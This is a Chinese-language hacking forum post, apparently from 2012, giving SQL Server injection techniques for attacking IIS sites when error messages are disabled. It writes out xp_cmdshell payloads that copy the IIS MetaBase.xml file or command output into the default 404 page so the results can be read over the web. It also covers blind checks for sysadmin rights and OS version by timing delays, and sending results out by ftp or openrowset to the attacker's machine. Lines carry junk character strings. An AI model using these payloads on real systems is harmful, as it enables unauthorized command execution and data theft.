中国网络渗透测试联盟

标题: 28度的冰注入技巧之(一)——404页面的妙用 [打印本页]
作者: admin    时间: 2012-9-15 14:15
标题: 28度的冰注入技巧之(一)——404页面的妙用
遇到一个sa注入点,mssql错误提示关闭无疑shi让人郁闷的事情。
6 ^" L, c' z( c( {, q% F* C4 D7 Q; i4 n- {5 M9 }
  虽然错误提示关闭也shi可能以列目录,执行命令,但shishi多少就有些不方便。阿D就可能以在错误提示关闭的情况下列目录。
2 A$ a% n' p8 x. q8 r8 A) T9 n) j  i( _% A$ d5 n9 r% t
  这里有一个很好的方法,让你得到web目录路径,让你得到服务器上的文件,让你执行命令得到回显。9 m3 m5 \1 p; F9 s2 B/ I
) u. G9 Y) q5 c6 p
  IIS,404页面的默认路径shi C:\Windows\Help\iisHelp\common\404b.htm
; j5 w7 i" F9 ~, u9 S7 e7 r+ V% Z' V+ ?8 Q- ^$ a9 w# s
  得到web路径exec master..xp_cmdshell ’copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm’--9 b, d/ q# |8 R1 N8 ]! t

; |+ _' G' s# C5 V. H  ,这shi20003,如果是2000的话,exec master..xp_cmdshell ’copy C:\Winnt\system32 \inetsrv\MetaBase.xml C:\Winnts\Help\iisHelp\common\404b.htm’--,在 MetaBase.xml存着IIS的很多信息。执行上面的语句之后,你再访问一下网站一个不存在的文件或目录,显示的就shiMetaBase.xml 的内容了。
. |$ u, _7 l) K6 E, N8 [- O" g8 ^6 o. I+ S2 r9 p
  执行命令得到回显
, n& }+ W% U9 P
( W6 g9 }! ^7 C$ w% L  通过上面得到web路径的方法,你肯定很容易想到怎么得到回显了吧。 2003,exec master..xp_cmdshell ’ver >C:\Windows\Help\iisHelp\common \404b.htm’--如果是2000,exec master..xp_cmdshell ’ver >C:\Winnt\Help \iisHelp\common\404b.htm’--
0 R0 T* ~8 O: P9 z1 c5 }. v+ Q+ V5 Q0 P  Z. ^8 g* l
  得到文件也shi相同,把文件copy到404b.htm就行了
, r; m- g2 X+ D% y( M* g% t6 S. m. q# I4 J
  by 28ice, 2008/6/26; i% G% O5 o* j4 y! R& v& A- J

4 c5 R+ l" o9 v# `& L  摘自 28度的冰
6 z, T2 c) q. H; U8 J
: J. x. E7 E5 V% W6 O( J  盲注判断权限和操作系统版本
. R) e9 \$ @2 T$ J1 T$ k+ r2 m* i  P3 n6 d" w* |3 U4 }
  首先第一个问题,如果错误提示关闭,怎么判断当前的权限shi否为sysadmin呢?+ \: }" Z$ t, u
% L; x- h. Z6 W9 f/ Q
  最简单的,可能以用这样的方法:. q- M5 \! p: I6 X+ F

, b. L$ `4 u9 q! E+ M! w+ E  1=(select IS_SRVROLEMEMBER(’sysadmin’))* P: E0 M/ K* D& I% s
+ a- M$ ~+ O0 P8 \/ u
  当然,有些情况下,这个方法并不奏效。. O4 ?  ]2 h+ o- R
! s. }% d; d3 y8 b. u! k- }
  既然shisa,我们就可能以通过执行命令判断,不过,既然错误提示关闭,那么执行的结果就很不容易拿到。0 @# o6 s8 C& D  ~! w2 z3 @
4 L+ Y1 K7 n: F4 U! @& d: p1 }
  有个3办法可能以解决这个问题# b/ B  a5 q) |: N
9 N! Z) I& S0 t8 Y( u
  a.把执行结果写到404b.htm,具体请看我的上一篇文章$ J- _/ {' u7 u/ f1 ^% T3 X

1 W8 ]% q- L* u  b.执行ping 127.1 -n 10,看看页面shi否延迟10秒钟
0 c7 T* X7 Q7 W
* g% U( P+ f9 |) U, h; \( V  c.如果1433端口可能以连接,那干脆新建个sql登录# y/ ^; N1 K2 j5 c

6 y* J# ]2 A" W$ S! O' E  d.如果大牛你shi公网Ip,openrowset,或者直接telnet,ftp到你自己的机子,说到这里,ftp还有别的用处,比如,把执行结果写到文件中,然后通过ftp传到你的机子上,这何尝不shi获得执行结果的一个好办法。当然,你可能能要用到ftp的-s参数
1 v9 z3 @/ J  y" ~5 n
! r/ T4 s) V7 s: f+ Q! q! \  还有一个问题,怎么判断系统shi2000还shi2003?当然指的shi错误提示关闭的情况下
( O; a; Y3 S; O* [, p' Q& Y
. k4 ?1 r7 P1 z; ~. J0 G  很简单
1 N) ^7 O! d3 W5 M8 v! w9 V; k% A6 E9 r0 H# D4 t) c9 n
  执行systeminfo, O1 P# X$ O* U, p& _' N: K
& ~# w2 ]* G( I8 J8 Y) I
  在xp/2003下才有这个命令,这个命令执行大概需要5秒钟时间。如果页面延迟5秒,就可能以进一步断定这shi2003(当然不排除2008的可能能性)。



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2